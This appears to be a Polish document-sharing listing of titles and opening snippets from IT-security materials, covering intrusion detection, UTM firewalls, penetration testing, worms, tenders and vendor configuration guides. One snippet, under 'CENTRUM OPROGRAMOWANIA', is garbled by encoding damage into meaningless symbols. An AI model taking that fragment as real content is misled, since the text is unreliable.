Polityka bezpieczeństwa i zarządzanie systemem wykrywania intruzów IDP i aktywnej ochrony przed atakami

Polityka bezpieczeństwa i zarządzanie systemem wykrywania intruzów IDP i aktywnej ochrony przed atakami Polityka bezpieczeństwa i zarządzanie systemem wykrywania intruzów IDP i aktywnej ochrony przed atakami Współczesnym systemom IDS zarzucane jest, że baza sygnatur ataków analizowana jest przez nie w sposób

Bardziej szczegółowo

Funkcjonalność ochrony przed intruzami w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń IPS

Funkcjonalność ochrony przed intruzami w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń IPS Funkcjonalność ochrony przed intruzami w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń IPS Produkty zabezpieczeń typu UTM (ang. unified threat management) to urządzenia, w których zawarte

Bardziej szczegółowo

Własności: Wykrywa ataki analizując całość ruchu sieciowego. Nie dopuszcza, żeby intruz dosięgnął chronionych zasobów

Własności: Wykrywa ataki analizując całość ruchu sieciowego. Nie dopuszcza, żeby intruz dosięgnął chronionych zasobów System wykrywania intruzów i aktywnej ochrony Wykrywa ataki analizując całość ruchu sieciowego Nie dopuszcza, żeby intruz dosięgnął chronionych zasobów to system zabezpieczeń sieciowych realizujący zadania

Bardziej szczegółowo

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Podstawowe zasady realizacji testów penetracyjnych systemu informatycznego Opracował: Mariusz Stawowski Utrzymywanie wysokiego poziomu bezpieczeństwa systemu informatycznego

Bardziej szczegółowo

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne

Bardziej szczegółowo

Funkcjonalność ochrony antywirusowej w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń AV

Funkcjonalność ochrony antywirusowej w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń AV Funkcjonalność ochrony antywirusowej w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń AV Produkty zabezpieczeń typu UTM (ang. unified threat management) to urządzenia, w których zawarte

Bardziej szczegółowo

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci N, Wykład 6: Bezpieczeństwo w sieci 1 Ochrona danych Ochrona danych w sieci musi zapewniać: Poufność nieupoważnione osoby nie mają dostępu do danych Uwierzytelnianie gwarancja pochodzenia Nienaruszalność

Bardziej szczegółowo

Robaki sieciowe. + systemy IDS/IPS

Robaki sieciowe. + systemy IDS/IPS Robaki sieciowe + systemy IDS/IPS Robak komputerowy (ang. computer worm) samoreplikujący się program komputerowy, podobny do wirusa komputerowego, ale w przeciwieństwie do niego nie potrzebujący nosiciela

Bardziej szczegółowo

Projektowanie bezpieczeństwa sieci i serwerów

Projektowanie bezpieczeństwa sieci i serwerów Projektowanie bezpieczeństwa sieci i serwerów Konfiguracja zabezpieczeń stacji roboczej 1. Strefy bezpieczeństwa przeglądarki Internet Explorer. W programie Internet Explorer można skonfigurować ustawienia

Bardziej szczegółowo

Projektowanie zabezpieczeń Centrów Danych oraz innych systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa

Projektowanie zabezpieczeń Centrów Danych oraz innych systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa Projektowanie zabezpieczeń Centrów Danych oraz innych systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa dr inż. Mariusz Stawowski mariusz.stawowski@clico.pl Agenda Wprowadzenie Specyficzne

Bardziej szczegółowo

Skuteczne rozpoznanie oraz kontrola aplikacji i użytkowników sieci - rozwiązanie Palo Alto Networks

Skuteczne rozpoznanie oraz kontrola aplikacji i użytkowników sieci - rozwiązanie Palo Alto Networks Skuteczne rozpoznanie oraz kontrola aplikacji i użytkowników sieci - rozwiązanie Palo Alto Networks Systemy informatyczne zmieniają się, a wraz z nimi wymagane jest stosowanie środków bezpieczeństwa odpowiednich

Bardziej szczegółowo

Marek Krauze Marek.Krauze@clico.pl

Marek Krauze Marek.Krauze@clico.pl Przeglądarka - juŝ nie najsłabsze ogniwo - laboratorium technologii WebCheck Marek Krauze Marek.Krauze@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagroŝenia związane

Bardziej szczegółowo

OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego

OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego ZADANIE V OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego A. ROZMIARY I CHARAKTER ZADANIA 1. W ramach dostawy oprogramowania antywirusowego Szpital

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Przewodnik instalacji i konfiguracji SofaWare S-box SofaWare S-box to niewielkiego rozmiaru, ciche w działaniu, łatwe w instalacji i zarządzaniu urządzenia Firewall

Bardziej szczegółowo

CENTRUM OPROGRAMOWANIA

CENTRUM OPROGRAMOWANIA CENTRUM OPROGRAMOWANIA Internet. Ta " " ### $ %on line&# ' Network Wizards (http://www.nw.com( ) * + #, * $ $ # - ) ) " ) "#, " " " $ " #. $ (ang. firewall), dedykowanego do ochrony systemu lokalnego #'$

Bardziej szczegółowo

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Przewodnik instalacji i konfiguracji systemu zabezpieczeń Check Point VPN-1/FireWall-1 SmallOffice NG SmallOffice jest uproszczoną w zakresie zarządzania wersją systemu

Bardziej szczegółowo

Funkcjonalność ochrony firewall w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń

Funkcjonalność ochrony firewall w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń Funkcjonalność ochrony firewall w urządzeniach UTM oraz specjalizowanych rozwiązaniach zabezpieczeń Produkty zabezpieczeń typu UTM (ang. unified threat management) to urządzenia, w których zawarte zostało

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Przewodnik konfiguracji i zarządzania Siemens 4YourSafety Konfiguracja Siemens 4YourSafety w zakresie systemu operacyjnego i supportu urządzenia może odbywać się w

Bardziej szczegółowo

Strategie i techniki ochrony systemów informatycznych

Strategie i techniki ochrony systemów informatycznych Strategie i techniki ochrony systemów informatycznych Systemy informatyczne są niezbędne do prawidłowego funkcjonowania większości firm i instytucji. Często zależy od nich realizacja zadań biznesowych.

Bardziej szczegółowo

BEZPIECZEŃSTWO W SIECIACH

BEZPIECZEŃSTWO W SIECIACH PREZENTACJA NA SYSTEMY OPERACYJNE Katarzyna Macioszek styczeń 2007 DEFINICJA ROBAKA CO TO JEST ROBAK? PRZYKŁADY ROBAKÓW Robak - program komputerowy zdolny do samoreplikacji przez sieć bez interakcji użytkownika

Bardziej szczegółowo

Przewodnik technologii ActivCard

Przewodnik technologii ActivCard PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Przewodnik technologii ActivCard Część VIII. Wykorzystanie kart Smart Card w systemie identyfikacji cyfrowej ActivPack CLICO Sp. z o.o., Al. 3-go Maja 7, 30-063 Kraków;

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Wykrrywani ie,, analiza i prrzeci iwdziałanie attakom hackerrów w Check Pointt FirreWal ll--1 Nextt Generratti ion ((NG)) Opracował: Mariusz Stawowski CCSA/CCSE (4.x,

Bardziej szczegółowo

9. System wykrywania i blokowania włamań ASQ (IPS)

9. System wykrywania i blokowania włamań ASQ (IPS) 9. System wykrywania i blokowania włamań ASQ (IPS) System Intrusion Prevention w urządzeniach NETASQ wykorzystuje unikalną, stworzoną w laboratoriach firmy NETASQ technologię wykrywania i blokowania ataków

Bardziej szczegółowo

Palo Alto firewall nowej generacji

Palo Alto firewall nowej generacji Palo Alto firewall nowej generacji Agenda Wprowadzenie do koncepcji firewall-a nowej generacji Główne funkcjonalności firewalla Palo Alto Dostępne modele sprzętowe Firewall nowej generacji w nawiązaniu

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Portale SSL VPN nowe możliwości dla biznesu Mariusz Stawowski, CISSP Efektywne prowadzenie biznesu wymaga swobodnego dostępu do informacji. Firmy starają się sprostać

Bardziej szczegółowo

Wykaz zmian w programie SysLoger

Wykaz zmian w programie SysLoger Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko

Bardziej szczegółowo

Instrukcja konfiguracji funkcji skanowania

Instrukcja konfiguracji funkcji skanowania Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji

Bardziej szczegółowo

4. Podstawowa konfiguracja

4. Podstawowa konfiguracja 4. Podstawowa konfiguracja Po pierwszym zalogowaniu się do urządzenia należy zweryfikować poprawność licencji. Można to zrobić na jednym z widżetów panelu kontrolnego. Wstępną konfigurację można podzielić

Bardziej szczegółowo

Nowe możliwości zapewnienia skutecznej ochrony przed zagrożeniami wewnętrznymi

Nowe możliwości zapewnienia skutecznej ochrony przed zagrożeniami wewnętrznymi Nowe możliwości zapewnienia skutecznej ochrony przed zagrożeniami wewnętrznymi Obecnie znakomita większość firm wykorzystujących technologie teleinformatyczne do prowadzenia biznesu, stosuje w swoich infrastrukturach

Bardziej szczegółowo

Wojciech Dworakowski. Zabezpieczanie aplikacji. Firewalle aplikacyjne - internetowych

Wojciech Dworakowski. Zabezpieczanie aplikacji. Firewalle aplikacyjne - internetowych Firewalle aplikacyjne - Zabezpieczanie aplikacji internetowych Wojciech Dworakowski Agenda Dlaczego tradycyjne mechanizmy nie wystarczają? Wykorzystanie zaawansowanych firewalli Firewalle aplikacyjne architektura

Bardziej szczegółowo

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA

PROFESJONALNE USŁUGI BEZPIECZEŃSTWA PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Instalacja i konfiguracja ActivCard Gold i Entrust/PKI w środowisku Microsoft Active Directory Przygotował: Mariusz Stawowski Entrust Certified Consultant CLICO Sp.

Bardziej szczegółowo

Panda Managed Office Protection. Przewodnik. Panda Managed Office Protection. Przewodnik

Panda Managed Office Protection. Przewodnik. Panda Managed Office Protection. Przewodnik Panda Managed Office Protection. Przewodnik Panda Managed Office Protection Przewodnik Maj 2008 Spis treści 1. Przewodnik po konsoli administracyjnej i monitorującej... 3 1.1. Przegląd konsoli... 3 1.2.

Bardziej szczegółowo

CENTRUM OPROGRAMOWANIA

CENTRUM OPROGRAMOWANIA CENTRUM OPROGRAMOWANIA Program realizacji kompleksowego audytu bezpieczeństwa systemu informatycznego Opracował: Konsultacje: Mariusz Stawowski dr Janusz Jarosz, Tomasz Ryś Cel audytu bezpieczeństwa Utrzymywanie

Bardziej szczegółowo

Zespól Szkół Ponadgimnazjalnych Nr 17 im. Jana Nowaka - Jeziorańskiego Al. Politechniki 37 Windows Serwer 2003 Instalacja

Zespól Szkół Ponadgimnazjalnych Nr 17 im. Jana Nowaka - Jeziorańskiego Al. Politechniki 37 Windows Serwer 2003 Instalacja 7 Windows Serwer 2003 Instalacja Łódź, styczeń 2012r. SPIS TREŚCI Strona Wstęp... 3 INSTALOWANIE SYSTEMU WINDOWS SERWER 2003 Przygotowanie instalacji serwera..4 1.1. Minimalne wymagania sprzętowe......4

Bardziej szczegółowo

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego 2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego produktu. 23 czerwca 2014 Spis treści 3 Spis treści...5

Bardziej szczegółowo

Bezpieczeństwo w M875

Bezpieczeństwo w M875 Bezpieczeństwo w M875 1. Reguły zapory sieciowej Funkcje bezpieczeństwa modułu M875 zawierają Stateful Firewall. Jest to metoda filtrowania i sprawdzania pakietów, która polega na analizie nagłówków pakietów

Bardziej szczegółowo

Przewodnik technologii ActivCard

Przewodnik technologii ActivCard PROFESJONALNE USŁUGI BEZPIECZEŃSTWA Przewodnik technologii ActivCard Część II. Polityka bezpieczeństwa systemu ActivPack CLICO Centrum Oprogramowania Sp. z o.o., Al. 3-go Maja 7, 30-063 Kraków; Tel: 12

Bardziej szczegółowo

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne Jarosław Kuchta Internetowe Usługi Informacyjne Komponenty IIS HTTP.SYS serwer HTTP zarządzanie połączeniami TCP/IP buforowanie odpowiedzi obsługa QoS (Quality of Service) obsługa plików dziennika IIS

Bardziej szczegółowo

Monitorowanie działania ania sieci i bezpieczeństwa

Monitorowanie działania ania sieci i bezpieczeństwa Monitorowanie działania ania sieci i bezpieczeństwa - dobre praktyki wykorzystania Juniper NSM i STRM dr inŝ.. Mariusz Stawowski mariusz.stawowski@clico.pl Agenda Wprowadzenie Monitorowanie bezpieczeństwa

Bardziej szczegółowo

Asix. Konfiguracja serwera MS SQL dla potrzeb systemu Asix. Pomoc techniczna NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI

Asix. Konfiguracja serwera MS SQL dla potrzeb systemu Asix. Pomoc techniczna NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI NIEZAWODNE ROZWIĄZANIA SYSTEMÓW AUTOMATYKI Asix Konfiguracja serwera MS SQL dla potrzeb systemu Asix Pomoc techniczna Dok. Nr PLP0024 Wersja:2015-03-04 ASKOM i Asix to zastrzeżony znak firmy ASKOM Sp.

Bardziej szczegółowo

Wstęp... ix. 1 Omówienie systemu Microsoft Windows Small Business Server 2008... 1

Wstęp... ix. 1 Omówienie systemu Microsoft Windows Small Business Server 2008... 1 Spis treści Wstęp... ix 1 Omówienie systemu Microsoft Windows Small Business Server 2008... 1 Składniki systemu Windows SBS 2008... 1 Windows Server 2008 Standard... 2 Exchange Server 2007 Standard...

Bardziej szczegółowo

Podstawy bezpieczeństwa

Podstawy bezpieczeństwa Podstawy bezpieczeństwa sieciowego Dariusz CHAŁADYNIAK 2 Plan prezentacji Złośliwe oprogramowanie Wybrane ataki na sieci teleinformatyczne Wybrane metody bezpieczeństwa sieciowego Systemy wykrywania intruzów

Bardziej szczegółowo

Wykaz zmian w programie SysLoger

Wykaz zmian w programie SysLoger Wykaz zmian w programie SysLoger Pierwsza wersja programu 1.0.0.1 powstała we wrześniu 2011. Funkcjonalność pierwszej wersji programu: 1. Zapis logów do pliku tekstowego, 2. Powiadamianie e-mail tylko

Bardziej szczegółowo

Spis treści. Dzień 1. I Wprowadzenie (wersja 0906) II Dostęp do danych bieżących specyfikacja OPC Data Access (wersja 0906) Kurs OPC S7

Spis treści. Dzień 1. I Wprowadzenie (wersja 0906) II Dostęp do danych bieżących specyfikacja OPC Data Access (wersja 0906) Kurs OPC S7 I Wprowadzenie (wersja 0906) Kurs OPC S7 Spis treści Dzień 1 I-3 O czym będziemy mówić? I-4 Typowe sytuacje I-5 Klasyczne podejście do komunikacji z urządzeniami automatyki I-6 Cechy podejścia dedykowanego

Bardziej szczegółowo

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze Specyfikacja oprogramowania do Opis zarządzania przedmiotu i monitorowania zamówienia środowiska Załącznik nr informatycznego 1 do specyfikacji Lp. 1. a) 1. Oprogramowanie oprogramowania i do systemów

Bardziej szczegółowo

Snifery wbudowane w Microsoft Windows

Snifery wbudowane w Microsoft Windows Snifery wbudowane w Microsoft Windows Prezentację przygotowali: Robert Milczarski Łukasz Stegliński Maciej Łaski Network Monitorw w Microsoft Windows Server 2003 Wbudowany w Windows monitor sieci wykorzystywany

Bardziej szczegółowo

Kancelaria Prawna.WEB - POMOC

Kancelaria Prawna.WEB - POMOC Kancelaria Prawna.WEB - POMOC I Kancelaria Prawna.WEB Spis treści Część I Wprowadzenie 1 Część II Wymagania systemowe 1 Część III Instalacja KP.WEB 9 1 Konfiguracja... dostępu do dokumentów 11 Część IV

Bardziej szczegółowo

7. Konfiguracja zapory (firewall)

7. Konfiguracja zapory (firewall) 7. Konfiguracja zapory (firewall) Konfiguracja firewalla w rozwiązaniach NETASQ podzielona jest na dwie części. Pierwszą z nich są reguły domyślne a drugą polityki konfigurowane przez administratora. W

Bardziej szczegółowo

Kompleksowe zabezpieczenie współczesnej sieci. Adrian Dorobisz inżnier systemowy DAGMA

Kompleksowe zabezpieczenie współczesnej sieci. Adrian Dorobisz inżnier systemowy DAGMA Kompleksowe zabezpieczenie współczesnej sieci Adrian Dorobisz inżnier systemowy DAGMA Ataki sieciowe SONY niedostępnośc usługi Playstation Network koszt: 3,4mld USD CIA niedostępnośc witryny Web cia.gov

Bardziej szczegółowo

INSTRUKCJA OBSŁUGI DLA SIECI

INSTRUKCJA OBSŁUGI DLA SIECI INSTRUKCJA OBSŁUGI DLA SIECI Zapisywanie dziennika druku w lokalizacji sieciowej Wersja 0 POL Definicje dotyczące oznaczeń w tekście W tym Podręczniku użytkownika zastosowano następujące ikony: Uwagi informują

Bardziej szczegółowo

Wszechstronne urządzenie. z wbudowanymi wszystkimi funkcjami. zapory ogniowej i technologiami. zabezpieczeń. Symantec Gateway Security SERIA 5400

Wszechstronne urządzenie. z wbudowanymi wszystkimi funkcjami. zapory ogniowej i technologiami. zabezpieczeń. Symantec Gateway Security SERIA 5400 Wszechstronne urządzenie z wbudowanymi wszystkimi funkcjami zapory ogniowej i technologiami zabezpieczeń Symantec Gateway Security SERIA 5400 W obliczu nowoczesnych, wyrafinowanych zagrożeń bezpieczeństwa

Bardziej szczegółowo

Praca w sieci z serwerem

Praca w sieci z serwerem 11 Praca w sieci z serwerem Systemy Windows zostały zaprojektowane do pracy zarówno w sieci równoprawnej, jak i w sieci z serwerem. Sieć klient-serwer oznacza podłączenie pojedynczego użytkownika z pojedynczej

Bardziej szczegółowo

Monitorowanie zdarzeń w sieci bankowej w odniesieniu do Rekomendacji D. Bartłomiej Kilanowicz, ASCOMP

Monitorowanie zdarzeń w sieci bankowej w odniesieniu do Rekomendacji D. Bartłomiej Kilanowicz, ASCOMP Monitorowanie zdarzeń w sieci bankowej w odniesieniu do Rekomendacji D. Bartłomiej Kilanowicz, ASCOMP Agenda Wymagania stawiane przez rekomendację D w zakresie monitorowania sieci i systemów bezpieczeństwa

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Konfiguracja VPN typu Site-Site pomiędzy SofaWare S-box i systemem Check Point VPN-1 Gateway NG SofaWare S-box to urządzenia Firewall i VPN dostarczane przez Check

Bardziej szczegółowo

iptables -F -t nat iptables -X -t nat iptables -F -t filter iptables -X -t filter echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -F -t nat iptables -X -t nat iptables -F -t filter iptables -X -t filter echo 1 > /proc/sys/net/ipv4/ip_forward Zarządzanie bezpieczeństwem w sieciach Router programowy z firewallem oparty o iptables Celem ćwiczenia jest stworzenie kompletnego routera (bramki internetowej), opartej na iptables. Bramka umożliwiać

Bardziej szczegółowo

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak Wykład 3 / Wykład 4 Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak 1 Wprowadzenie do Modułu 3 CCNA-E Funkcje trzech wyższych warstw modelu OSI W jaki sposób ludzie wykorzystują

Bardziej szczegółowo

ZALECENIA DLA MIGRACJI NS-BSD V8 => V9

ZALECENIA DLA MIGRACJI NS-BSD V8 => V9 ZALECENIA DLA MIGRACJI NS-BSD V8 => V9 Wprowadzenie Wersja 9 NS-BSD wprowadza wiele zmian. Zmieniła się koncepcja działania niektórych modułów NETASQ UTM. Sam proces aktualizacji nie jest więc całkowicie

Bardziej szczegółowo

Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe. Parametry wymagane przez Zamawiającego

Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe. Parametry wymagane przez Zamawiającego Zmieniona Tabela nr 1a - Oprogramowanie antywirusowe Lp. Parametry wymagane przez Zamawiającego (nazwa oferowanego oprogramowania) Parametry oferowane przez Wykonawcę (TAK- parametry zgodne z wymaganymi

Bardziej szczegółowo

Wykład Nr 4. 1. Sieci bezprzewodowe 2. Monitorowanie sieci - polecenia

Wykład Nr 4. 1. Sieci bezprzewodowe 2. Monitorowanie sieci - polecenia Sieci komputerowe Wykład Nr 4 1. Sieci bezprzewodowe 2. Monitorowanie sieci - polecenia Sieci bezprzewodowe Sieci z bezprzewodowymi punktami dostępu bazują na falach radiowych. Punkt dostępu musi mieć

Bardziej szczegółowo

1 Dostarczony system bezpieczeństwa musi zapewniać wszystkie wymienione poniżej funkcje bezpieczeństwa oraz funkcjonalności dodatkowych.

1 Dostarczony system bezpieczeństwa musi zapewniać wszystkie wymienione poniżej funkcje bezpieczeństwa oraz funkcjonalności dodatkowych. 1 Dostarczony system bezpieczeństwa musi zapewniać wszystkie wymienione poniżej funkcje bezpieczeństwa oraz funkcjonalności dodatkowych. Integralność systemu musi być zapewniona także w przypadku różnych

Bardziej szczegółowo

Produkty. ESET Produkty

Produkty. ESET Produkty Produkty ESET Produkty czerwiec 2006 COPYRIGHT ArkaNET KATOWICE CZERWIEC 2006 KOPIOWANIE I ROZPOWSZECHNIANIE ZABRONIONE ESET Produkty czerwiec 2006 Wersja dokumentu W dokumencie użyto obrazków zaczerpniętych

Bardziej szczegółowo

Wireshark analizator ruchu sieciowego

Wireshark analizator ruchu sieciowego Wireshark analizator ruchu sieciowego Informacje ogólne Wireshark jest graficznym analizatorem ruchu sieciowego (snifferem). Umożliwia przechwytywanie danych transmitowanych przez określone interfejsy

Bardziej szczegółowo

Zarządzanie bezpieczeństwem systemów informatycznych w skali przedsiębiorstwa - Juniper Security Threat Response Manager (STRM)

Zarządzanie bezpieczeństwem systemów informatycznych w skali przedsiębiorstwa - Juniper Security Threat Response Manager (STRM) Zarządzanie bezpieczeństwem systemów informatycznych w skali przedsiębiorstwa - Juniper Security Threat Response Manager (STRM) dr inż. Mariusz Stawowski mariusz.stawowski@clico.pl Agenda Wprowadzenie

Bardziej szczegółowo

LABORATORIUM SIECI KOMPUTEROWYCH (compnet.et.put.poznan.pl)

LABORATORIUM SIECI KOMPUTEROWYCH (compnet.et.put.poznan.pl) Wydział Elektroniki i Telekomunikacji POLITECHNIKA POZNAŃSKA fax: (+48 61) 665 25 72 ul. Piotrowo 3a, 60-965 Poznań tel: (+48 61) 665 22 93 LABORATORIUM SIECI KOMPUTEROWYCH (compnet.et.put.poznan.pl) Sieci

Bardziej szczegółowo

Axence nvision Nowe możliwości w zarządzaniu sieciami

Axence nvision Nowe możliwości w zarządzaniu sieciami www.axence.pl Axence nvision Nowe możliwości w zarządzaniu sieciami Axence nvision moduły NETWORK Monitorowanie serwerów, urządzeń i aplikacji INVENTORY Inwentaryzacja sprzętu i oprogramowania, audyty

Bardziej szczegółowo

Systemy ochrony komputerów osobistych Opis programu Sygate Personal Firewall v.5.5.

Systemy ochrony komputerów osobistych Opis programu Sygate Personal Firewall v.5.5. Systemy ochrony komputerów osobistych Opis programu Sygate Personal Firewall v.5.5. W ostatnich latach dostrzeżono konieczność ochrony komputerów osobistych. Zwykle nie przechowuje się na nich strategicznych

Bardziej szczegółowo

Wymagania dotyczące systemu analizy bezpieczeństwa sieci -

Wymagania dotyczące systemu analizy bezpieczeństwa sieci - Załącznik nr 1 Szczegółowy opis przedmiotu zamówienia Wymagania dotyczące systemu analizy bezpieczeństwa sieci - System analizy bezpieczeństwa sieci (system zbierania i korelowania incydentów i logów związanych

Bardziej szczegółowo

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA

PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA PROFESJONALNE SYSTEMY BEZPIECZEŃSTWA Procedura konfiguracji SofaWare S-box w zakresie zestawienia łącza Neostrada Plus i zabezpieczenia komputera użytkownika Neostrada Plus to usługa stałego dostępu do

Bardziej szczegółowo

WYMAGANE PARAMETRY TECHNICZNE OFEROWANYCH URZĄDZEŃ ZABEZPIECZAJĄCYCH

WYMAGANE PARAMETRY TECHNICZNE OFEROWANYCH URZĄDZEŃ ZABEZPIECZAJĄCYCH Załącznik nr 3 Do SIWZ DZP-0431-550/2009 WYMAGANE PARAMETRY TECHNICZNE OFEROWANYCH URZĄDZEŃ ZABEZPIECZAJĄCYCH 1 typ urządzenia zabezpieczającego Wymagane parametry techniczne Oferowane parametry techniczne

Bardziej szczegółowo

Zagrożenia związane z udostępnianiem aplikacji w sieci Internet

Zagrożenia związane z udostępnianiem aplikacji w sieci Internet Zagrożenia związane z udostępnianiem aplikacji w sieci Internet I Ogólnopolska Konferencja Informatyki Śledczej Katowice, 8-9 stycznia 2009 Michał Kurek, Aleksander Ludynia Cel prezentacji Wskazanie skali

Bardziej szczegółowo

TCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko

TCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko TCP/IP Warstwa aplikacji mgr inż. Krzysztof Szałajko Modele odniesienia 7 Aplikacji 6 Prezentacji 5 Sesji 4 Transportowa 3 Sieciowa 2 Łącza danych 1 Fizyczna Aplikacji Transportowa Internetowa Dostępu

Bardziej szczegółowo

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus

Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Wymagania techniczne infrastruktury IT potrzebne do uruchomienia i pracy ServiceDesk Plus Status: Tajemnica handlowa Wersja z dnia: 23 października 2013 Strona: 1 z 8 SPIS TREŚCI 1. Wymagania dla serwera

Bardziej szczegółowo

11. Autoryzacja użytkowników

11. Autoryzacja użytkowników 11. Autoryzacja użytkowników Rozwiązanie NETASQ UTM pozwala na wykorzystanie trzech typów baz użytkowników: Zewnętrzna baza zgodna z LDAP OpenLDAP, Novell edirectory; Microsoft Active Direcotry; Wewnętrzna

Bardziej szczegółowo

SIECI KOMPUTEROWE I TECHNOLOGIE INTERNETOWE

SIECI KOMPUTEROWE I TECHNOLOGIE INTERNETOWE Politechnika Gdańska Wydział Elektrotechniki i Automatyki Katedra Inżynierii Systemów Sterowania SIECI KOMPUTEROWE I TECHNOLOGIE INTERNETOWE Temat: Identyfikacja właściciela domeny. Identyfikacja tras

Bardziej szczegółowo

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH.

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Spis treści 1. Konfiguracja poczty Exchange dla klienta pocztowego Outlook 2007 protokół Exchange

Bardziej szczegółowo

Tytuł: Instrukcja obsługi Modułu Komunikacji internetowej MKi-sm TK / 3001 / 016 / 002. Wersja wykonania : wersja oprogramowania v.1.

Tytuł: Instrukcja obsługi Modułu Komunikacji internetowej MKi-sm TK / 3001 / 016 / 002. Wersja wykonania : wersja oprogramowania v.1. Zakład Elektronicznych Urządzeń Pomiarowych POZYTON sp. z o. o. 42-200 Częstochowa ul. Staszica 8 p o z y t o n tel. : (034) 361-38-32, 366-44-95, 364-88-82, 364-87-50, 364-87-82, 364-87-62 tel./fax: (034)

Bardziej szczegółowo

Bezprzewodowy ruter kieszonkowy/punkt dostępowy DWL-G730AP. Dysk CD z Podręcznikiem użytkownika. Kabel ethernetowy kat. 5 UTP

Bezprzewodowy ruter kieszonkowy/punkt dostępowy DWL-G730AP. Dysk CD z Podręcznikiem użytkownika. Kabel ethernetowy kat. 5 UTP Urządzenie można skonfigurować za pomocą każdej nowoczesnej przeglądarki internetowej, np. Internet Explorer 6 lub Netscape Navigator 6.2.3. DWL-G730AP Bezprzewodowy ruter kieszonkowy/punkt dostępowy D-Link

Bardziej szczegółowo

